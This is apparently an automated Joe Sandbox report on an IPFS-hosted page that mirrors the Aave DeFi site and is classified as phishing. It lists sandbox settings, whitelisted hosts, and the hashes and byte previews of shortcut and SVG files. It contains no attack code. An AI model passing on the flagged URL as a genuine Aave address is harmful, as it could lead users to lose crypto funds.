                                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                  Overall analysis duration:0h 4m 32s
                                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                                  Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                  Sample URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                                  Classification:mal56.phis.win@25/653@54/23
                                                                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                  • Browse: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  • Browse: https://app.aave.com/staking
                                                                                                                                                                                                                                                  • Browse: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/
                                                                                                                                                                                                                                                  • Browse: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/markets/
                                                                                                                                                                                                                                                  • Browse: https://discord.com/invite/aave
                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 216.58.212.131, 64.233.184.84, 216.58.206.78, 34.104.35.123, 4.175.87.197, 142.250.185.74, 142.250.181.234, 142.250.185.138, 142.250.185.106, 216.58.212.170, 142.250.74.202, 216.58.206.42, 172.217.16.138, 142.250.185.170, 142.250.186.170, 142.250.184.234, 142.250.186.42, 172.217.18.10, 142.250.185.234, 142.250.184.202, 142.250.185.202, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.3.187.198, 142.250.186.99, 142.250.186.138, 216.58.206.74, 142.250.186.74, 172.217.16.202, 142.250.186.106, 172.217.16.206
                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                  • VT rate limit hit for: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  No simulations
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 03:11:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                  Entropy (8bit):3.974415183028594
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:8hkdWTSWkHridAKZdA19ehwiZUklqehny+3:8hdT4Uy
                                                                                                                                                                                                                                                  MD5:D329C1F3417E80868DB646D97B83E0E3
                                                                                                                                                                                                                                                  SHA1:76E2F51702C8C6F9D399434D368BB502A06A873A
                                                                                                                                                                                                                                                  SHA-256:C141B4BB1E81CD92C62F79E0CCA60868AC853F8FBE1F5F3ABDD0BFD4D1462706
                                                                                                                                                                                                                                                  SHA-512:2F852E17C10F903027D07B8B77EB2265545464CDCFE9CB7739037F2FE3397F84FCD5BC84EFBD038FB3BEFB84AF15B6EC5CB043211D58F6B69827A6F80E9CD90D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....a...\...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Ys!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 03:11:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                  Entropy (8bit):3.991058776023429
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:8/dWTSWkHridAKZdA1weh/iZUkAQkqehEy+2:8UTS9QZy
                                                                                                                                                                                                                                                  MD5:63345056D9ECB7C70E45FCD568D95707
                                                                                                                                                                                                                                                  SHA1:72872A42EABAAAB4ED925824CC8D46EAC190A1F4
                                                                                                                                                                                                                                                  SHA-256:1CBD479AD32FD53CE2B3CF2A7345B7C55336A290620C46346A51E5444A204FBE
                                                                                                                                                                                                                                                  SHA-512:F6FF637635851BF801ED0AED13A2C00EE3EDBAA3955B7E049209094E9045B768B4E653B268EE22DF9CFED0B85F70708E2C98B36537E94BD28B290EBFABA60597
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....""..\...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Ys!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                  Entropy (8bit):4.004977424867342
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:8x/dWTSWsHridAKZdA14tseh7sFiZUkmgqeh7smy+BX:8xUTCn4y
                                                                                                                                                                                                                                                  MD5:1258E55063AC96ABCE60650CA7D75EE2
                                                                                                                                                                                                                                                  SHA1:8FC73BD1F13C0473904E88251965545C610C63A9
                                                                                                                                                                                                                                                  SHA-256:ADEF276CACC57DD7EC9EFAC4CA47ED555957A7FEC08C3D1123791AA161FC07C7
                                                                                                                                                                                                                                                  SHA-512:336032A56F3DA40F96110A696CD97946BF59D71F516CB2DDF6AFB4E6B161EB6DBF7A46BB357CCA0353A83502CEA3C83CD1C326C49FA5A35F42EF1D343452BB2C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 03:11:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                  Entropy (8bit):3.9908729817749897
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:8VdWTSWkHridAKZdA1vehDiZUkwqehgy+R:8eT5uy
                                                                                                                                                                                                                                                  MD5:7A35853AAF5636CF2FDF2CD2404FB1F0
                                                                                                                                                                                                                                                  SHA1:C6FCC453682E371D5DCF827E12AEAB6C875BA379
                                                                                                                                                                                                                                                  SHA-256:476E0FF75A7F4E87684FEAE6D081A1A07E78DFDB950917C8609EF2AE3D4F2C94
                                                                                                                                                                                                                                                  SHA-512:49A9DAEA9D8F8A10F67ECC1D994481F216F7DFB1330560414EA7FF22DC5766C36E4C54A3FC098D104607D4E1FF06107A44A77153CB6DA965B3179EB7AFD14EB5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....z..\...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Ys!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 03:11:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                  Entropy (8bit):3.9783890796014276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:80dWTSWkHridAKZdA1hehBiZUk1W1qeh6y+C:8tTJ9ay
                                                                                                                                                                                                                                                  MD5:E1AB5C7698B20F40E27F4AE4BB625A5A
                                                                                                                                                                                                                                                  SHA1:6F1EF918F10B2CE1037DB3205190C425DB4953D8
                                                                                                                                                                                                                                                  SHA-256:F6BDDF2CF9B4BA9C77B8751279FF0ED04489A2879CE89786ED9C59E078A58017
                                                                                                                                                                                                                                                  SHA-512:2CE41E4950D74FDC41594262B173BDD06A9C2B0926A24BFCA4CF121773F7788D3F7885A5D4003DF9D0B1DEE76E086EC0495D17EEBBD52B44E36DFA6C47F796F4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....L..\...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Ys!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 03:11:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                  Entropy (8bit):3.9870069452609167
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:8PdWTSWkHridAKZdA1duT+ehOuTbbiZUk5OjqehOuTb4y+yT+:8kTVT/TbxWOvTb4y7T
                                                                                                                                                                                                                                                  MD5:2FC5A4A8233554F9EDCF5D869C8AA249
                                                                                                                                                                                                                                                  SHA1:2E79C5F21688CC07D16B4EE0E28656F315298629
                                                                                                                                                                                                                                                  SHA-256:F072F39FB705AA457B788BA6D16F98444AFFCBC7CCF56E873524EB857450B0CE
                                                                                                                                                                                                                                                  SHA-512:CB717FC2450EC7EBE711D62AB20E4771AB00B5864C02224E636129D6C4696BE55850AE6A7037C738469C758455D8F4B802C2BFA69DDB0EEEA1AD8F4D1DB564A7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....> ..\...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Yo!....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Yo!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Yo!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Yo!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Ys!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............0.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):87973
                                                                                                                                                                                                                                                  Entropy (8bit):5.125806607183933
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:f0kGwo/3g1MGEN6UCSQyYHhU58xxfrDX/5CF+gD58G3LpV9H5B7va:f0kGDZc
                                                                                                                                                                                                                                                  MD5:E05640582E20F17E0F1797160B67DCD4
                                                                                                                                                                                                                                                  SHA1:DCB27383F5836437E5433C7CCB5981E94826EE00
                                                                                                                                                                                                                                                  SHA-256:E9DEEBCC271633C282AB3FE440CE81A196ECE4F402804FE8940030F98C563475
                                                                                                                                                                                                                                                  SHA-512:60CDDA59E85FDED81B351614DAF3D40B30F939F7F8D9B586F516165699822E8F07F344CDD3709DCF6ADA350C725330DF26B6947322F154AB54D02C5AF3AAD71B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/b9995525a52dc58aecf5.svg
                                                                                                                                                                                                                                                  Preview:<svg width="1440" height="900" viewBox="0 0 1440 900" preserveAspectRatio="xMinYMin slice" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M1440 0H0v900h1440V0Z" fill="url(#c)"/><path d="M1440 0H435.551v620.81H1440V0Z" fill="url(#d)"/><path d="M1440 341.601H484.351v558.38H1440v-558.38Z" fill="url(#e)"/><path d="M1440 0H427.5v690.995H1440V0Z" fill="url(#f)"/><path d="M787.663 810.02c330.987-141.179 530.547-416.834 445.727-615.692C1148.57-4.53 811.492-51.288 480.502 89.891 149.512 231.07-50.048 506.725 34.772 705.583c84.821 198.858 421.901 245.616 752.891 104.437Z" fill="url(#g)"/><path d="M1024.18 825.565c290.6-123.952 456.96-386.723 371.57-586.916-85.39-200.193-390.19-261.999-680.792-138.047-290.602 123.952-456.959 386.724-371.569 586.917 85.389 200.193 390.19 261.998 680.791 138.046Z" fill="url(#h)"/><path d="M673.907 771.815c264.238-112.707 429.363-319.136 368.823-461.073-60.538-141.936-323.823-165.631-588.061-52.924C190.431 370.5
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):6321
                                                                                                                                                                                                                                                  Entropy (8bit):6.047618250834545
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:tg7mZhXeov6Vn6OPbhEQhUrZ6/947vjWLfCcEoQ+6Ny1QXLR1KXkVmks232YvvO0:QmZV6VdhEFkl4hn3XXKXkVzGYvvy0xfV
                                                                                                                                                                                                                                                  MD5:19B416D849CAB8E380747A535A5FFDC6
                                                                                                                                                                                                                                                  SHA1:DEAE4F450EBAE10FB8609D1E70F5AF9201D743F8
                                                                                                                                                                                                                                                  SHA-256:1BACF67CF153ED11DF37509111E853B92C09E2F15AE25D3052A3B550E87EE7C8
                                                                                                                                                                                                                                                  SHA-512:CE8383CA8F9213752D0CCC1CBCDF736C704CB1CFF86457B6D872A4FF67124651FA99AA25E3D07167FACE1077BFCA662D667C35115467404F0C3A9F5CACAC83AF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/networks/ethereum.svg
                                                                                                                                                                                                                                                  Preview:<svg width="24" height="24" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#b" transform="scale(.00781)"/></pattern><image id="b" width="128" height="128" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAYAAADDPmHLAAARKElEQVR4Ae1d25MVxRnfsiyfQlVe4pOW+SOsSl7iQ3xK+T/EqjOrIRgTk4gxamZmYcFdUAGRmyKieFlcYFVEWVdAkYsYvKEhSoJYUauge86eZZc9sLtwOvXrs8POmTPT3XM7070yVafOXHt6vt+vv758X3/d1TUPt/vc2k/vXuL9otv1ftvteMsqDt1escneikMOV2xyouKQMxWbeBWHTvEf3+fncA337MUzeBZpIC2kOQ9FZf4nLXLZT+7qIb+xHLrSsunBikPOVWzCCvk55BzegXfhnXi3+RI07Atcl93Q7Xq/tlyv17LJEcuhM4WArUAivJvnwfV6kSfkzTBxmpPdbrf6S8sh6yyHVssCXPZe5A15RF7NkazGOV3o1n5uueQRy6Ffy4Sv23XkGXnHN2gsYj2zVnHprZZDhyo2begGbPL80Ab/Fpfeqqe0NcpV9xLyK8shw8mFXFCjT6EdkCSv+DZ8o0Yi1yMrVo93O2/B5yzwJOB08l7ek+jxbtdD+iXmotut3lRxyGAnha/VuxwyCBmUCEE5r3Zddr3l0vsth0xoBUgJGggygCwgk3LQ6PBb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2978
                                                                                                                                                                                                                                                  Entropy (8bit):4.663799526528363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:+2d0/YxPWpKUz0V4X9wMWd4XHZbSd06fWLWdH8gGLWP:+oxPWYdg2MWdgHYdlfaWl8gqM
                                                                                                                                                                                                                                                  MD5:EEA03772EFC06A350F82C9392F239BAC
                                                                                                                                                                                                                                                  SHA1:B71FA591B8AB4DEBB69D7119D2EFD96508D83D77
                                                                                                                                                                                                                                                  SHA-256:957755DC5613E30463D0018F158EB50B70C2901CF1051E01BB67F9EC6B662194
                                                                                                                                                                                                                                                  SHA-512:A32E3DAF88F7D228EF64EE45C8903E6EBE711469626ABBC51461C97E0E6AB9E7B3202352853E02019DF9016972982F1EFB967E7D7644E1DAF5E71A986154A052
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="71.989" height="20" data-name="Group 13859"><defs><linearGradient id="a" x1="-1.999" x2="1.962" y1="1.034" y2=".112" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#30bac6"/><stop offset="1" stop-color="#b6509e"/></linearGradient><linearGradient id="b" x1="-4.048" x2="1.181" y1="1.315" y2=".379" xlink:href="#a"/><linearGradient id="c" x1="-1.123" x2="2.834" y1=".926" y2=".004" xlink:href="#a"/><linearGradient id="d" x1="-.051" x2="3.906" y1=".677" y2="-.246" xlink:href="#a"/></defs><g data-name="Group 10477"><g data-name="Aave Logo Colored"><g data-name="Group 4051"><path fill="url(#a)" d="m227.16 18.7-6.974-16.918a1.487 1.487 0 0 1-.086-.48 1.326 1.326 0 0 1 .343-.943 1.2 1.2 0 0 1 .925-.36 1.25 1.25 0 0 1 .72.24 1.526 1.526 0 0 1 .5.634l6.632 16.555L235.848.874a1.525 1.525 0 0 1 .5-.634 1.25 1.25 0 0 1 .72-.24 1.2 1.2 0 0 1 .925.36 1.326 1.326 0 0 1 .343.943 1.487 1.487 0 0 1-.08
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16384), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):5.586883037796327
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:cyPm+dOyFQSzKCUaufok1bE1pCtoqPmEpmjVHubNjE2pElTkwX:cyP9dpFQYGoEWC5Bp0uhjE2Gl1X
                                                                                                                                                                                                                                                  MD5:5CAEA66A94ED3F92D45CC0E555CD6201
                                                                                                                                                                                                                                                  SHA1:7623E7E85F72A29370A8F046E3FF9982FCD95039
                                                                                                                                                                                                                                                  SHA-256:5C57947307554FAD2A1FA28A1291FFBF128471C99F38B02C343E2B103F7BD408
                                                                                                                                                                                                                                                  SHA-512:52427E81A89A20EEF3AB9FC8B03642D3B771B2DF4F0385CD644BAF4180F7D412FEBB5FAE1A9E55B7EA7B673CF9EDDCC91393880E6A8BFF68CED9D56118058310
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
